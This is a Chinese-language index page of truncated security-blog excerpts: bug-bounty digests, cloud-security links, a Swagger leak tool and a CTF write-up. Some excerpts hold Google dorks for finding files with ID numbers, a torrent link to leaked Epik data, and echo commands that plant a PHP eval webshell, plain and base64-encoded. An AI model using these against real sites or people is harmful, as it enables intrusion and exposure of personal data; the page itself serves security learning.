威胁情报获取(浏览器)
Google搜索payload(文件类型+根域+关键词): filetype:xls site:xxx.huoxian.cn sfzh filetype:xls site:xxx.huoxian.cn 身份证号 filetype:pdf site:xxx.huoxian.cn sfzh filetype:pdf site:xxx...
2022年3月10日 23:34
bugbounty技巧聚合20210917
热点跟踪 匿名黑客泄露数百 GB 的 Epik 数据 下载地址:http://ddosecrets.com/images/1/13/EpikFail.torrent 漏洞报告 Topcoder SSRF经典利用方式,读取aws元数据 http://hackerone.com/report...
2022年3月10日 23:34
bugbounty技巧聚合20220104
漏洞报告 【Zivver】在 AndroidManifest 中启用 ADB 备份 http://hackerone.com/reports/1225158 【LINE】 不正确的授权允许在通知通道服务器中泄露用户的通知数据 http://hackerone.com/report...
2022年3月10日 23:33bugbounty技巧聚合20211122
漏洞报告 【Internet Bug Bounty 1,200刀】Ruby - Regular Expression Denial of Service Vulnerability of Date Parsing Methods http://hackerone.com/reports/1404789 【Internet Bug Bounty...
2022年3月10日 23:33bugbounty技巧聚合20211110
漏洞报告 【Internet Bug Bounty 4,000 USD】Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 http://hackerone.com/reports/1394916 【Rockset】Failure to I...
2022年3月10日 23:33bugbounty技巧聚合20210928
漏洞报告 【Localize 50刀】文档名处的存储xss http://hackerone.com/reports/1321407 【Tor】Tor Browser using --log or --verbose logs the exact connection time a client connects to any...
2022年3月10日 23:33bugbounty技巧聚合20210910
漏洞报告 Avito url跳转绕过 http://hackerone.com/reports/956449 挖洞技巧 两个账户劫持漏洞 http://blog.usamav.dev/two-account-takeover-bugs-worth-4300-dollar-bounty Azure跨账户容器劫...
2022年3月10日 23:33
渗透变得如此轻松!多亏看了第十七期「听火」线上会议沙龙
官方出会议总结啦!11月26号晚举行的第十七期「听火」线上会议沙龙高能不断。会议分享嘉宾为:303,分享议题为:看似朴实无华的弱口令。 引言 大家觉得在登录功能中常见的漏洞有哪些?常见的漏...
2022年3月10日 23:33bugbounty技巧聚合20211118
漏洞报告 【Rockstar Games 1,000 USD】Social Club Account Takeover Via RGL And Steam/Epic Linked Account http://hackerone.com/reports/1235008 【TikTok 500 USD】BYPASSING COMMENTING ...
2022年3月10日 23:33bugbounty技巧聚合20211202
漏洞报告 【VK.com】XSS http://hackerone.com/reports/1115763 【 VK.com】#1343280 Получаем название и аватарку (50x50) частной группы. http://ha...
2022年3月10日 23:33每日云安全技术资讯20220302
在线查看容器镜像里面的文件、层级和依赖关系 http://contains.dev/ 容器安全清单:从镜像到工作负载 http://github.com/krol3/container-security-checklist AWS Lambda 函数攻击 http://sysdi...
2022年3月10日 23:33bugbounty技巧聚合20220119
漏洞报告 通过 post auth SSRF 窃取管理 JWT (CVE-2021-22056) http://blog.assetnote.io/2022/01/17/workspace-one-access-ssrf/ 挖洞技巧 Top 10 web hacking techniques of 2021 - PortSwigg...
2022年3月10日 23:33bugbounty技巧聚合20211222
漏洞报告 【Judge.me】 Log4j RCE http://hackerone.com/reports/1427589 【Acronis 】通过日志文件泄露管理员密码 http://hackerone.com/reports/1121972 挖洞技巧 进程注入 http://www.netero...
2022年3月10日 23:33
¥Swagger REST API 信息泄露利用工具¥
http://github.com/lijiejie/swagger-exp 这是一个 Swagger REST API 信息泄露利用工具。 主要功能有: 遍历所有API接口,自动填充参数 尝试 GET / POST 所有接口,返回 Response Code / Conten...
2022年3月10日 23:33RCE~获取完整shell(Linux)
直接echo写入webshell: echo '<?php eval($_POST[1]); ?>' > 1.php base64写入webshell echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==' | base64 -d >1.php 重定向符号被转义时用ba...
2022年3月10日 23:33
CISP-PTE认证中遇到的CTF题目及WP(一)
0x01 前言 本来想着先补充一文教你xxxxxx(三)的,这到过年了项目还是有点多,报告都没写完,还是先放这篇文章吧,,,,,,CISP-PTE中的题目,毕竟网上的资料比较少,因为考这个贵呀,,大家...
2022年3月10日 23:33
